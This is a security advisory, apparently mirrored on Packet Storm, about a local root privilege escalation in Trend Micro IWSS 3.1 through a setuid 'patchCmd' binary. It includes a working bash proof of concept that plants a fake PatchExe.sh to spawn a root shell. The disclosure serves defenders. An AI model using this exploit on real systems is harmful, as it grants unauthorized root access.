Exploit the possiblities

Trendmicro IWSS 3.1 Privilege Escalation

Trendmicro IWSS 3.1 Privilege Escalation
Posted Oct 26, 2011
Authored by Jose Ramon Villa

A vulnerability was found in the software IWSS of TrendMicro that could allow an attacker to gain root access in the system. The binary "patchCmd" has sticky permissions for the "setuid" and "setgid" with the user root. The execution is allowed to all users. The code performs a setuid(0) before an a system() by that the execution will take root permissions regardless of user permissions.

tags | exploit, root
MD5 | 3b1d604b657dd23769236647f8fe44b5

Trendmicro IWSS 3.1 Privilege Escalation

Change Mirror Download
                    #############################
# BUGUROO SECURITY ADVISORY #
#############################

[ ADVISORY ]

Title: Trendmicro IWSS 3.1 privilege escalation
Product: InterScan Web Security Suite (IWSS)
Vendor: TrendMicro
Advisory ID: BSA-2011-002
Advisory URL: http://buguroo.com/adv/BSA-2011-002.txt
Date published: 25/10/2011


[ DISCLAIMER ]

Buguroo Offensive Security, S.L. assumes no liability for the use of
the information provided in this advisory. This advisory was released
in an effort to help the I.T. community protect themselves against a
potentially dangerous security hole. This advisory is not an attempt
to solicit business.


[ INFORMATION ]

Impact: Privilege escalation
Remotely: No
Locally: Yes
CVSS: 8.1
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:F/RL:U/RC:UR/CDP:H/TD:ND/CR:H/IR:H/AR:H)
CVE: Not assigned yet.


[ DESCRIPTION ]

A vulnerability was found in the software IWSS of TrendMicro that
could allow an attacker to gain root access in the system.

The binary "patchCmd" has sticky permissions for the "setuid" and
"setgid" with the user root. The execution is allowed to all
users.

The code performs a setuid(0) before an a system() by that the
execution will take root permissions regardless of user permissions.

system() calls two scripts:
"./PatchExe.sh" and "./RollbackExe.sh" depending the input parameters
of "patchCmd".

As you can see the string "./" Indicates the execution in the
current directory, you can easily create new scripts in another
PATH and force the execution on it.


[ VULNERABLE PRODUCTS ]

* IWSS <= 3.1 (linux)
* IWSS <= 3.1 (solaris)


[ WORKAROUNDS ]

None at this moment.


[ PROOF OF CONCEPT ]

To exploit this vulnerability as a proof of concept we create a
script in the PATH of a user without privileges who simply open
a new setuid(0) Bourne Shell.

The binary is executed with the appropriate input to compose
the execution parameters and then scale privileges.

--------------------------------------------------------------------
#!/bin/bash
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com

cd /tmp
echo "[*] Creating shell file"
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
echo "[*] Change permissions"
chmod 755 PatchExe.sh
echo "[*] Got r00t... Its free!"
/opt/trend/iwss/data/patch/bin/patchCmd u root
--------------------------------------------------------------------


[ TIMELINE ]

26/06/2011 - Vulnerability was identified
28/06/2011 - Vendor contacted multiple times:
* SR2-1-547365091
* SR2-1-547365101
* SR2-1-547374771
* SR2-1-547378291
03/08/2011 - We send more documents to TrendMicro.
25/10/2011 - Due to the lack of response from TrendMicro we
publish this vulnerability.


[ ACKNOWLEDGMENTS ]

This vulnerability was discovered and researched by:
- Jose Ramon Villa <jrvilla.AT.buguroo.com>


[ REFERENCES ]

* http://blog.buguroo.com
* http://www.buguroo.com


[ ABOUT BUGUROO ]

Buguroo is a Spanish offensive security company founded in 2007
exclusively dedicated to the development of IT security solutions.
We are a 100% R+D company under continuous evolution and
technological renovation, enabling us to stay at the vanguard of
our sector and to offer a first class service world wile.


[ LICENSE ]

The contents of this advisory are copyright (c) 2011 Buguroo
Offensive Security S.L. are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (International)

License: http://creativecommons.org/licenses/by-nc-sa/3.0/

# EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close